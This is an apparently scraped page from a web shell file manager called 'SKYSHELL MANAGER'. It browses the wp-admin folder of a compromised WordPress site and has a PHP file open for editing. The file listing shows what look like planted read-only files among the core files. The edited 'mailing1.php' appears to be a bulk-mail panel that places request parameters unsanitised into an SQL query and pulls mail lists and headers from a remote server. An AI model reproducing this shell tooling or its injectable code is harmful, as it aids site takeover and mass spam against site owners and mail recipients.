📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: mailing1.php
<?php define('INCLUDE_CHECK',true); include_once 'connect.php'; $pid=$_REQUEST['pid']; $eid=$_REQUEST['eid']; $rec=select1("SELECT * from wmail.mprocess where process_id='$pid'"); /** get the header from main server */ if($_REQUEST['key']==1) { $hflag=trim($_REQUEST['hflag']); $soption=$_REQUEST['soption']; echo "<select name='ChooseHeader' id='ChooseHeader' class='input-medium'> <option value='000' selected=''>Select Header</option>"; echo file_get_contents("$local_server/common_file.php?key=12&soption=$soption"); echo "</select>"; ?> <script type='text/javascript'> var local_path='<?php echo "$local_path"; ?>'; var local_server='<?php echo "$local_server"; ?>'; var hflag='<?php echo "$hflag"; ?>'; //for update process header $(document).ready(function () { /** read the header from main server start */ $('#ChooseHeader').change(function() { var hd=$('input[name=texttype]:radio:checked').val(); if( hd =='multipart') { $('#hrd_msg').val('header loading...'); }else { $('#header').val('header loading...'); } var tag=$(this).val(); $.get(local_server+'/common_file.php?key=11&hname='+tag,function(data) { //var out=data.split('\n');out.shift(); //var arrString = out.join('\n'); var arrString = data; if(hflag !=1){ if( hd =='plain') { $('#header').val(arrString); } else if(hd =='html') { $('#header').val(arrString); } else if(hd =='multipart') { $('#hrd_msg').val(arrString); } } if(hflag ==1 ){ $('#hader_content').val(arrString); } }); }); }); </script> <?php exit; } if(trim($_REQUEST['key'])==2) { $mail_list_file=getMaillistFileName(); $mail_data=file_get_contents("$CONFIG_DIR/$mail_list_file"); echo $mail_data; exit; } ?> <html> <head> <!-- Bootstrap --> <link rel="stylesheet" href="css/bootstrap.min1.css"> <!-- Bootstrap responsive --> <link rel="stylesheet" href="css/bootstrap-responsive.min.css"> <!-- jQuery UI --> <link rel="stylesheet" href="css/plugins/jquery-ui/smoothness/jquery-ui.css"> <link rel="stylesheet" href="css/plugins/jquery-ui/smoothness/jquery.ui.theme.css"> <!-- Theme CSS --> <link rel="stylesheet" href="css/style.css"> <!-- Color CSS --> <link rel="stylesheet" href="css/themes.css"> <!-- color box --> <!--<link rel="stylesheet" href="js/plugins/colorbox/colorbox.css"> --> <!-- jQuery --> <script src="js/jquery.min.js"></script> <!-- jQuery UI --> <script src="js/plugins/jquery-ui/jquery.ui.core.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.widget.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.mouse.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.draggable.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.resizable.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.sortable.min.js"></script> <!-- Bootstrap --> <script src="js/bootstrap.min.js"></script> <!-- color box --> <!--<script src="js/plugins/colorbox/jquery.colorbox.js"></script> --> <!--[if lte IE 9]> <script src="js/plugins/placeholder/jquery.placeholder.min.js"></script> <script> $(document).ready(function() { $('input, textarea').placeholder(); }); </script> <![endif]--> <!-- Favicon --> <!-- Apple devices Homescreen icon --> <link rel="apple-touch-icon-precomposed" href="img/apple-touch-icon-precomposed.png" /> <style type="text/css"> #pageloaddiv { position: fixed;left: 0px;top: 0px;width: 100%;height: 100%;z-index: 1000;background: url('<?php echo $loading_img_url;?>') no-repeat center center;border:1px solid 1px; } </style> <style type="text/css"> body { background: #E6E6FA !important; } /* Adding !important forces the browser to overwrite the default style applied by Bootstrap */ </style> </head> <body bgcolor="#E6E6FA"> <div id="pageloaddiv"></div> <div id='page_content' style='display:none;'> <form id="mailing_form" class="form-horizontal form-validate" method="POST" action="#" novalidate="novalidate"> <div class="row-fluid"> <div class="span2" id='ip_mail_span'> <div class="box"> <div class="box-title"> <ul class="tabs tabs tabs-left"> <li class="active"> <a href="#set" data-toggle="tab">IP</a> </li> <li class=""> <a href="#mail" data-toggle="tab">Mail</a> </li> <li class=""> <a href="#domain_cycle_tab" data-toggle="tab">Domain</a> </li> <!-- <li class=""> <a href="#track_id_tab" data-toggle="tab">Track ID</a> </li> --> </ul> </div> </div> </div> </div> </form> </body> </html>
Save